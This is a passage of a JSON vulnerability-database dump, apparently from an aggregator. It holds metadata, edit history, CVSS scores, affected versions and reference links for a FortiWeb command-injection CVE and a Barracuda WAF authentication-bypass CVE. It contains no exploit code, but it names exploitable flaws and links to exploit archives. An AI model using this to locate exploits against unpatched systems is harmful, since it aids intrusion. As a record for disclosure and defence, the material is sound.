"d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cpeConfiguration", "hash": "60f4526cc30a0223c5f25a9cbc7ce8e6"}, {"key": "cvelist", "hash": "4840c5df25a3fd37270aff0a5831164e"}, {"key": "cvss", "hash": "62e86bb7716385cd46817416916a7bbd"}, {"key": "cvss2", "hash": "326bb90a9de8254bb7b400e76890967f"}, {"key": "cvss3", "hash": "797434013b6a54d859a5263bc756e7a6"}, {"key": "cwe", "hash": "934ce29157a6d45c8431abcaa5060724"}, {"key": "description", "hash": "86e39bacc290416bdfa3d5a723b3f1d1"}, {"key": "extraReferences", "hash": "e87108dcdb45ccf16f50908d8410c54f"}, {"key": "href", "hash": "8f9566aa5bdc7cf750f94851ab8e4108"}, {"key": "immutableFields", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "modified", "hash": "59a1198c00f060ebd8b59a8b5572b498"}, {"key": "published", "hash": "88e192d3d83d08064d987c8b035fa109"}, {"key": "references", "hash": "c640c55a311aa3b9f706bd0f4e92d1ca"}, {"key": "reporter", "hash": "8adff3bd6ff340d5d16b4fd7d021c516"}, {"key": "title", "hash": "292cbc6028be005a3731b50fb0919e2f"}, {"key": "type", "hash": "1716b5fcbb7121af74efdc153d0166c5"}], "hash": "37d14a410646b0911f9310e1cac916c884b072c6b303c215a3326ec8a0d4b9b8", "viewCount": 31, "enchantments": {"dependencies": {"references": [{"type": "githubexploit", "idList": ["ED9550C1-0AFC-53DF-9BFA-AA6341B6E5AF"]}, {"type": "seebug", "idList": ["SSV:99335"]}, {"type": "fortinet", "idList": ["FG-IR-21-116", "FG-IR-20-120"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:9511625276530FB6A6D0D99D27559BAB"]}, {"type": "threatpost", "idList": ["THREATPOST:BE0B5E93BD5FBBCB893FDDFE5348FDE9"]}, {"type": "thn", "idList": ["THN:FCBB400B24C7B24CD6B5136FA8BE38D3"]}], "modified": "2021-06-11T07:40:12", "rev": 2}, "score": {"value": 6.8, "vector": "NONE", "modified": "2021-06-11T07:40:12", "rev": 2}, "twitter": {"counter": 22, "tweets": [{"link": "https://twitter.com/cybersecureny/status/1428258164345081857", "text": "BleepinComputer: /serghei FortiWeb zero-day now tracked as CVE-2021-22123, workaround available, patch incoming.\n\nMore details: https://t.co/PagsYHDjQS?amp=1 /BleepinComputer/status/1428257101491712004 /hashtag/cybersecurity?src=hashtag_click /hashtag/hacking?src=hashtag_click /hashtag/computersecurity?src=hashtag_click /hashtag/nyc?src=hashtag_click /hashtag/newyork?src=hashtag_click"}, {"link": "https://twitter.com/Real_aka_Lucifr/status/1428275351986311168", "text": "Fortinet FortiWeb Os Command Injection (Authenticated)\n/hashtag/CVE?src=hashtag_click-2021-22123 /hashtag/poc?src=hashtag_click"}, {"link": "https://twitter.com/deepquest/status/1428680859343892489", "text": "How it started: CVE-2018-13379\nHow it ended: CVE-2021-22123"}, {"link": "https://twitter.com/KristoferA/status/1428681864361902081", "text": "How it started: CVE-2018-13379\nHow it ended: CVE-2021-22123"}, {"link": "https://twitter.com/certuy/status/1428819173539471360", "text": "Vulnerabilidad de inyecci\u00f3n de comandos sobre en /hashtag/FortiWeb?src=hashtag_click puede permitir a un atacante autenticado remoto ejecute comandos arbitrarios.\n\nVersiones afectadas: \n6.3.7 y anteriores. \n6.2.3 y anteriores. \n6.1.x, 6.0.x, 5.9.x.\n\n/hashtag/CVE?src=hashtag_click-2021-22123"}, {"link": "https://twitter.com/CswWorks/status/1429360321400029185", "text": "/Fortinet informed of a zero-day command injection vulnerability, a variant of CVE-2021-22123, in the FortiWeb WAF. This flaw allows arbitrary commands with root privileges via a SAML server configuration page\nRead the full analysis - https://t.co/S5Teb47B4C?amp=1\n/hashtag/CyberFeed?src=hashtag_click /hashtag/CyberNews?src=hashtag_click"}, {"link": "https://twitter.com/elhackernet/status/1429442482417192966", "text": "Explicaciones p\u00fablicas grave vulnerabilidad en productos Fortinet FortiWeb OS\n- CVE-2021-22123 - Gravedad CVSS 8.7 sobre 10"}, {"link": "https://twitter.com/RubertPereira/status/1429445094223065091", "text": "Explicaciones p\u00fablicas grave vulnerabilidad en productos Fortinet FortiWeb OS\n- CVE-2021-22123 - Gravedad CVSS 8.7 sobre 10\nhttps://t.co/jj66xZAZAu?amp=1 cordiales, soluciones en el Area Informatica Sigueme @Informatico_Mcy"}, {"link": "https://twitter.com/ipssignatures/status/1429641042102525953", "text": "(Same from about 2 hours ago.)\nI think that the third retweeted(11 times) tweet that contains CVE ID between Aug 20 2021 13:01 UTC and Aug 21 2021 13:00 UTC is:\n/TheHackersNews/status/1427838506265497604\nIt has CVE-2021-22123. /hashtag/l24_nn6peb3au6xj4?src=hashtag_click"}, {"link": "https://twitter.com/ipssignatures/status/1429671745376694274", "text": "I think that the third retweeted(11 times) tweet that contains CVE ID between Aug 22 2021 05:01 UTC and Aug 23 2021 05:00 UTC is:\n/elhackernet/status/1429442482417192966\nIt has CVE-2021-22123. /hashtag/l24_nn6peb3au6xj4?src=hashtag_click"}], "modified": "2021-06-11T07:40:12"}}, "objectVersion": "1.5", "cpe": [], "affectedSoftware": [{"cpeName": "fortinet:fortiweb", "name": "fortinet fortiweb", "operator": "lt", "version": "6.3.8"}, {"cpeName": "fortinet:fortiweb", "name": "fortinet fortiweb", "operator": "lt", "version": "6.2.4"}], "affectedConfiguration": [], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"children": [], "cpe_match": [{"cpe23Uri": "cpe:2.3:a:fortinet:fortiweb:6.2.4:*:*:*:*:*:*:*", "cpe_name": [], "versionEndExcluding": "6.2.4", "versionStartIncluding": "5.9.0", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:fortinet:fortiweb:6.3.8:*:*:*:*:*:*:*", "cpe_name": [], "versionEndExcluding": "6.3.8", "versionStartIncluding": "6.3.0", "vulnerable": true}], "operator": "OR"}]}, "extraReferences": [{"name": "https://fortiguard.com/advisory/FG-IR-20-120", "refsource": "CONFIRM", "tags": ["Vendor Advisory"], "url": "https://fortiguard.com/advisory/FG-IR-20-120"}], "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "COMPLETE", "baseScore": 9.0, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.0, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 2.8, "impactScore": 5.9}, "cpe23": [], "cwe": ["CWE-78"], "scheme": null}, {"bulletinFamily": "NVD", "hash": "6a0ace8cdb63863b470e6561269f441d83851201520bc6a55e7930a925c15e3a", "id": "CVE-2014-2595", "lastseen": "2021-04-22T23:44:08", "description": "Barracuda Web Application Firewall (WAF) 7.8.1.013 allows remote attackers to bypass authentication by leveraging a permanent authentication token obtained from a query string.", "objectVersion": "1.5", "published": "2020-02-12T01:15:00", "cvelist": ["CVE-2014-2595"], "viewCount": 76, "modified": "2020-02-20T15:55:00", "references": ["https://www.portcullis-security.com/security-research-and-downloads/security-advisories/cve-2014-2595/", "http://www.osvdb.org/109782", "https://www.securityfocus.com/bid/69028", "https://www.exploit-db.com/exploits/39278", "http://packetstormsecurity.com/files/127740/Barracuda-WAF-Authentication-Bypass.html", "https://vulners.com/securityvulns/SECURITYVULNS:DOC:31004", "http://seclists.org/fulldisclosure/2014/Aug/5"], "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "edition": 8, "reporter": "cve@mitre.org", "title": "CVE-2014-2595", "history": [{"bulletin": {"affectedSoftware": [], "bulletinFamily": "NVD", "cpe": [], "cpe23": [], "cvelist": ["CVE-2014-2595"], "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "cwe": [], "description": "Barracuda Web Application Firewall (WAF) 7.8.1.013 allows remote attackers to bypass authentication by leveraging a permanent authentication token obtained from a query string.", "edition": 3, "enchantments": {"dependencies": {"modified": "2020-02-13T14:29:47", "references": [{"idList": ["PACKETSTORM:127740"], "type": "packetstorm"}, {"idList": ["SECURITYVULNS:DOC:31004", "SECURITYVULNS:VULN:13887"], "type": "securityvulns"}, {"idList": ["EDB-ID:39278"], "type": "exploitdb"}]}, "score": {"modified": "2020-02-13T14:29:47", "value": 6.9, "vector": "NONE"}}, "hash": "0d148bb322c927927cf5c8adaba4daf0d811bf2bee4917f93ca62ca2f942333e", "hashmap": [{"hash": "584cd9e6927eaaa814c6545414f09911", "key": "description"}, {"hash": "cf46dbeffc0c7dc51130bcd388b4459a", "key": "references"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cwe"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "affectedSoftware"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe23"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvss3"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvss2"}, {"hash": "afd8c4a8002c25596504fc1efc107886", "key": "cvelist"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "23075837e6c728c8f0077b2ae5d5ee7f", "key": "modified"}, {"hash": "6c607768196e3786ab17cb3a6e516cad", "key": "published"}, {"hash": "756bd44ad36e62b951b7a08611cbd3f5", "key": "href"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe"}, {"hash": "bc7f8fc71017e1124d57947313af5643", "key": "title"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-2595", "id": "CVE-2014-2595", "lastseen": "2020-02-13T14:29:47", "modified": "2020-02-12T13:07:00", "objectVersion": "1.3", "published": "2020-02-12T01:15:00", "references": ["https://www.portcullis-security.com/security-research-and-downloads/security-advisories/cve-2014-2595/", "http://www.osvdb.org/109782", "https://www.securityfocus.com/bid/69028", "https://www.exploit-db.com/exploits/39278", "http://packetstormsecurity.com/files/127740/Barracuda-WAF-Authentication-Bypass.html", "https://vulners.com/securityvulns/SECURITYVULNS:DOC:31004", "http://seclists.org/fulldisclosure/2014/Aug/5"], "reporter": "cve@mitre.org", "title": "CVE-2014-2595", "type": "cve", "viewCount": 28}, "differentElements": ["cpe23", "cvss", "cvss2", "modified", "cpe", "cwe", "affectedSoftware"], "edition": 3, "lastseen": "2020-02-13T14:29:47"}, {"bulletin": {"affectedSoftware": [], "bulletinFamily": "NVD", "cpe": [], "cpe23": [], "cvelist": ["CVE-2014-2595"], "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "cwe": [], "description": "Barracuda Web Application Firewall (WAF) 7.8.1.013 allows remote attackers to bypass authentication by leveraging a permanent authentication token obtained from a query string.", "edition": 2, "enchantments": {"dependencies": {"modified": "2020-02-12T14:27:29", "references": [{"idList": ["PACKETSTORM:127740"], "type": "packetstorm"}, {"idList": ["SECURITYVULNS:DOC:31004", "SECURITYVULNS:VULN:13887"], "type": "securityvulns"}, {"idList": ["EDB-ID:39278"], "type": "exploitdb"}]}, "score": {"modified": "2020-02-12T14:27:29", "value": 6.9, "vector": "NONE"}}, "hash": "6ccf8f84237981876cda9914b348e4e11c8972875cdf630f59422732f1ea69ba", "hashmap": [{"hash": "584cd9e6927eaaa814c6545414f09911", "key": "description"}, {"hash": "cf46dbeffc0c7dc51130bcd388b4459a", "key": "references"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cwe"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "affectedSoftware"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe23"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvss3"}, {"hash": "6c607768196e3786ab17cb3a6e516cad", "key": "modified"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvss2"}, {"hash": "afd8c4a8002c25596504fc1efc107886", "key": "cvelist"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "6c607768196e3786ab17cb3a6e516cad", "key": "published"}, {"hash": "756bd44ad36e62b951b7a08611cbd3f5", "key": "href"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe"}, {"hash": "bc7f8fc71017e1124d57947313af5643", "key": "title"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-2595", "id": "CVE-2014-2595", "lastseen": "2020-02-12T14:27:29", "modified": "2020-02-12T01:15:00", "objectVersion": "1.3", "published": "2020-02-12T01:15:00", "references": ["https://www.portcullis-security.com/security-research-and-downloads/security-advisories/cve-2014-2595/", "http://www.osvdb.org/109782", "https://www.securityfocus.com/bid/69028", "https://www.exploit-db.com/exploits/39278", "http://packetstormsecurity.com/files/127740/Barracuda-WAF-Authentication-Bypass.html", "https://vulners.com/securityvulns/SECURITYVULNS:DOC:31004", "http://seclists.org/fulldisclosure/2014/Aug/5"], "reporter": "cve@mitre.org", "title": "CVE-2014-2595", "type": "cve", "viewCount": 28}, "differentElements": ["modified"], "edition": 2, "lastseen": "2020-02-12T14:27:29"}, {"bulletin": {"affectedConfiguration": [], "affectedSoftware": [{"cpeName": "barracuda:web_application_firewall", "name": "barracuda web application firewall", "operator": "eq", "version": "7.8.1.013"}], "bulletinFamily": "NVD", "cpe": ["cpe:/a:barracuda:web_application_firewall:7.8.1.013"], "cpe23": ["cpe:2.3:a:barracuda:web_application_firewall:7.8.1.013:*:*:*:*:*:*:*"], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"cpe_match": [{"cpe23Uri": "cpe:2.3:a:barracuda:web_application_firewall:7.8.1.013:*:*:*:*:*:*:*", "vulnerable": true}], "operator": "OR"}]}, "cvelist": ["CVE-2014-2595"], "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 3.9, "impactScore": 5.9}, "cwe": ["CWE-613"], "description": "Barracuda Web Application Firewall (WAF) 7.8.1.013 allows remote attackers to bypass authentication by leveraging a permanent authentication token obtained from a query string.", "edition": 6, "enchantments": {"dependencies": {"modified": "2020-10-03T12:01:15", "references": [{"idList": ["PACKETSTORM:127740"], "type": "packetstorm"}, {"idList": ["SECURITYVULNS:DOC:31004", "SECURITYVULNS:VULN:13887"], "type": "securityvulns"}, {"idList": ["EDB-ID:39278"], "type": "exploitdb"}], "rev": 2}, "score": {"modified": "2020-10-03T12:01:15", "rev": 2, "value": 6.9, "vector": "NONE"}}, "extraReferences": [], "hash": "65fabd8c3b92ccbba797b3dfba517234b9e0e8bc2464531f2cd64047dd457870", "hashmap": [{"hash": "584cd9e6927eaaa814c6545414f09911", "key": "description"}, {"hash": "cf46dbeffc0c7dc51130bcd388b4459a", "key": "references"}, {"hash": "92ee34fefd5301ff6ccb77b813c8d4f8", "key": "modified"}, {"hash": "86870277fcb3e3e121fe9e4f1f7c2b51", "key": "cwe"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "affectedConfiguration"}, {"hash": "405ecfc0fb244283a2773863614145bf", "key": "cpe23"}, {"hash": "e63509ce8b627fb239a5a63969122026", "key": "cvss2"}, {"hash": "832b9c21b4589969549f63eb0724398c", "key": "cpe"}, {"hash": "0e66a595df2112e69adac8e55cbdb92d", "key": "cpeConfiguration"}, {"hash": "a97b191a26cb922c0b82d26c5f04f4db", "key": "affectedSoftware"}, {"hash": "ad35358d166de03a84a3a9280d95337a", "key": "cvss3"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "afd8c4a8002c25596504fc1efc107886", "key": "cvelist"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "extraReferences"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "6c607768196e3786ab17cb3a6e516cad", "key": "published"}, {"hash": "0b053db5674b87efff89989a8a720df3", "key": "cvss"}, {"hash": "756bd44ad36e62b951b7a08611cbd3f5", "key": "href"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}, {"hash": "bc7f8fc71017e1124d57947313af5643", "key": "title"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-2595", "id": "CVE-2014-2595", "lastseen": "2020-10-03T12:01:15", "modified": "2020-02-20T15:55:00", "objectVersion": "1.3", "published": "2020-02-12T01:15:00", "references": ["https://www.portcullis-security.com/security-research-and-downloads/security-advisories/cve-2014-2595/", "http://www.osvdb.org/109782", "https://www.securityfocus.com/bid/69028", "https://www.exploit-db.com/exploits/39278", "http://packetstormsecurity.com/files/127740/Barracuda-WAF-Authentication-Bypass.html", "https://vulners.com/securityvulns/SECURITYVULNS:DOC:31004", "http://seclists.org/fulldisclosure/2014/Aug/5"], "reporter": "cve@mitre.org", "title": "CVE-2014-2595", "type": "cve", "viewCount": 56}, "differentElements": ["extraReferences"], "edition": 6, "lastseen": "2020-10-03T12:01:15"}, {"bulletin": {"affectedSoftware": [{"name": "barracuda web_application_firewall", "operator": "eq", "version": "7.8.1.013"}], "bulletinFamily": "NVD", "cpe": ["cpe:/a:barracuda:web_application_firewall:7.8.1.013"], "cpe23": ["cpe:2.3:a:barracuda:web_application_firewall:7.8.1.013:*:*:*:*:*:*:*"], "cvelist": ["CVE-2014-2595"], "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {}, "cwe": ["CWE-613"], "description": "Barracuda Web Application Firewall (WAF) 7.8.1.013 allows remote attackers to bypass authentication by leveraging a permanent authentication token obtained from a query string.", "edition": 4, "enchantments": {"dependencies": {"modified": "2020-02-21T13:06:26", "references": [{"idList": ["PACKETSTORM:127740"], "type": "packetstorm"}, {"idList": ["SECURITYVULNS:DOC:31004", "SECURITYVULNS:VULN:13887"], "type": "securityvulns"}, {"idList": ["EDB-ID:39278"], "type": "exploitdb"}], "rev": 2}, "score": {"modified": "2020-02-21T13:06:26", "rev": 2, "value": 6.9, "vector": "NONE"}}, "hash": "4423bdd8d6936961112ee89e752cf7c866f443470052f4a4ac3529b4be6ae18f", "hashmap": [{"hash": "584cd9e6927eaaa814c6545414f09911", "key": "description"}, {"hash": "cf46dbeffc0c7dc51130bcd388b4459a", "key": "references"}, {"hash": "92ee34fefd5301ff6ccb77b813c8d4f8", "key": "modified"}, {"hash": "86870277fcb3e3e121fe9e4f1f7c2b51", "key": "cwe"}, {"hash": "405ecfc0fb244283a2773863614145bf", "key": "cpe23"}, {"hash": "e63509ce8b627fb239a5a63969122026", "key": "cvss2"}, {"hash": "832b9c21b4589969549f63eb0724398c", "key": "cpe"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvss3"}, {"hash": "afd8c4a8002c25596504fc1efc107886", "key": "cvelist"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "6c607768196e3786ab17cb3a6e516cad", "key": "published"}, {"hash": "0b053db5674b87efff89989a8a720df3", "key": "cvss"}, {"hash": "756bd44ad36e62b951b7a08611cbd3f5", "key": "href"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}, {"hash": "bc7f8fc71017e1124d57947313af5643", "key": "title"}, {"hash": "ee2d931efb4c4fa7a1a321df76c0b838", "key": "affectedSoftware"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-2595", "id": "CVE-2014-2595", "lastseen": "2020-02-21T13:06:26", "modified": "2020-02-20T15:55:00", "objectVersion": "1.3", "published": "2020-02-12T01:15:00", "references": ["https://www.portcullis-security.com/security-research-and-downloads/security-advisories/cve-2014-2595/", "http://www.osvdb.org/109782", "https://www.securityfocus.com/bid/69028", "https://www.exploit-db.com/exploits/39278", "http://packetstormsecurity.com/files/127740/Barracuda-WAF-Authentication-Bypass.html", "https://vulners.com/securityvulns/SECURITYVULNS:DOC:31004", "http://seclists.org/fulldisclosure/2014/Aug/5"], "reporter": "cve@mitre.org", "title": "CVE-2014-2595", "type": "cve", "viewCount": 47}, "differentElements": ["cvss3", "affectedSoftware"], "edition": 4, "lastseen": "2020-02-21T13:06:26"}, {"bulletin": {"affectedConfiguration": [], "affectedSoftware": [{"cpeName": "barracuda:web_application_firewall", "name": "barracuda web application firewall", "operator": "eq", "version": "7.8.1.013"}], "bulletinFamily": "NVD", "cpe": ["cpe:/a:barracuda:web_application_firewall:7.8.1.013"], "cpe23": ["cpe:2.3:a:barracuda:web_application_firewall:7.8.1.013:*:*:*:*:*:*:*"], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"cpe_match": [{"cpe23Uri": "cpe:2.3:a:barracuda:web_application_firewall:7.8.1.013:*:*:*:*:*:*:*", "vulnerable": true}], "operator": "OR"}]}, "cvelist": ["CVE-2014-2595"], "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 3.9, "impactScore": 5.9}, "cwe": ["CWE-613"], "description": "Barracuda Web Application Firewall (WAF) 7.8.1.013 allows remote attackers to bypass authentication by leveraging a permanent authentication token obtained from a query string.", "edition": 7, "enchantments": {"dependencies": {"modified": "2021-02-02T06:14:28", "references": [{"idList": ["PACKETSTORM:127740"], "type": "packetstorm"}, {"idList": ["SECURITYVULNS:DOC:31004", "SECURITYVULNS:VULN:13887"], "type": "securityvulns"}, {"idList": ["EDB-ID:39278"], "type": "exploitdb"}], "rev": 2}, "score": {"modified": "2021-02-02T06:14:28", "rev": 2, "value": 6.9, "vector": "NONE"}}, "extraReferences": [{"name": "http://packetstormsecurity.com/files/127740/Barracuda-WAF-Authentication-Bypass.html", "refsource": "MISC", "tags": ["Third Party Advisory", "Exploit", "VDB Entry"], "url": "http://packetstormsecurity.com/files/127740/Barracuda-WAF-Authentication-Bypass.html"}, {"name": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:31004", "refsource": "MISC", "tags": ["Third Party Advisory", "Exploit"], "url": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:31004"}, {"name": "http://www.osvdb.org/109782", "refsource": "MISC", "tags": ["Broken Link"], "url": "http://www.osvdb.org/109782"}, {"name": "https://www.portcullis-security.com/security-research-and-downloads/security-advisories/cve-2014-2595/", "refsource": "MISC", "tags": ["Broken Link"], "url": "https://www.portcullis-security.com/security-research-and-downloads/security-advisories/cve-2014-2595/"}, {"name": "https://www.exploit-db.com/exploits/39278", "refsource": "MISC", "tags": ["Third Party Advisory", "Exploit", "VDB Entry"], "url": "https://www.exploit-db.com/exploits/39278"}, {"name": "https://www.securityfocus.com/bid/69028", "refsource": "MISC", "tags": ["Third Party Advisory", "Exploit", "VDB Entry"], "url": "https://www.securityfocus.com/bid/69028"}, {"name": "http://seclists.org/fulldisclosure/2014/Aug/5", "refsource": "MISC", "tags": ["Third Party Advisory", "Mailing List", "Exploit"], "url": "http://seclists.org/fulldisclosure/2014/Aug/5"}], "hash": "d6e72c33ebf3accfe25046812d0b1e7698f2d37c9159defa7c7bda26e2ab359b", "hashmap": [{"hash": "584cd9e6927eaaa814c6545414f09911", "key": "description"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "immutableFields"}, {"hash": "cf46dbeffc0c7dc51130bcd388b4459a", "key": "references"}, {"hash": "92ee34fefd5301ff6ccb77b813c8d4f8", "key": "modified"}, {"hash": "86870277fcb3e3e121fe9e4f1f7c2b51", "key": "cwe"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "affectedConfiguration"}, {"hash": "405ecfc0fb244283a2773863614145bf", "key": "cpe23"}, {"hash": "e63509ce8b627fb239a5a63969122026", "key": "cvss2"}, {"hash": "832b9c21b4589969549f63eb0724398c", "key": "cpe"}, {"hash": "0e66a595df2112e69adac8e55cbdb92d", "key": "cpeConfiguration"}, {"hash": "a97b191a26cb922c0b82d26c5f04f4db", "key": "affectedSoftware"}, {"hash": "ad35358d166de03a84a3a9280d95337a", "key": "cvss3"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "073d5951cb97bd54baf9ef00e5950ef4", "key": "extraReferences"}, {"hash": "afd8c4a8002c25596504fc1efc107886", "key": "cvelist"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "6c607768196e3786ab17cb3a6e516cad", "key": "published"}, {"hash": "0b053db5674b87efff89989a8a720df3", "key": "cvss"}, {"hash": "756bd44ad36e62b951b7a08611cbd3f5", "key": "href"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}, {"hash": "bc7f8fc71017e1124d57947313af5643", "key": "title"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-2595", "id": "CVE-2014-2595", "immutableFields": [], "lastseen": "2021-02-02T06:14:28", "modified": "2020-02-20T15:55:00", "objectVersion": "1.5", "published": "2020-02-12T01:15:00", "references": ["https://www.portcullis-security.com/security-research-and-downloads/security-advisories/cve-2014-2595/", "http://www.osvdb.org/109782", "https://www.securityfocus.com/bid/69028", "https://www.exploit-db.com/exploits/39278", "http://packetstormsecurity.com/files/127740/Barracuda-WAF-Authentication-Bypass.html", "https://vulners.com/securityvulns/SECURITYVULNS:DOC:31004", "http://seclists.org/fulldisclosure/2014/Aug/5"], "reporter": "cve@mitre.org", "title": "CVE-2014-2595", "type": "cve", "viewCount": 60}, "different_elements": ["cpeConfiguration"], "edition": 7, "lastseen": "2021-02-02T06:14:28"}], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-2595", "enchantments": {"dependencies": {"references": [{"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:13887", "SECURITYVULNS:DOC:31004"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:127740"]}, {"type": "exploitdb", "idList": ["EDB-ID:39278"]}], "modified": "2021-04-22T23:44:08", "rev": 2}, "score": {"value": 6.9, "vector": "NONE", "modified": "2021-04-22T23:44:08", "rev": 2}}, "type": "cve", "hashmap": [{"key": "affectedConfiguration", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "affectedSoftware", "hash": "a97b191a26cb922c0b82d26c5f04f4db"}, {"key": "bulletinFamily", "hash": "601892ece72be3be2f57266ca2354792"}, 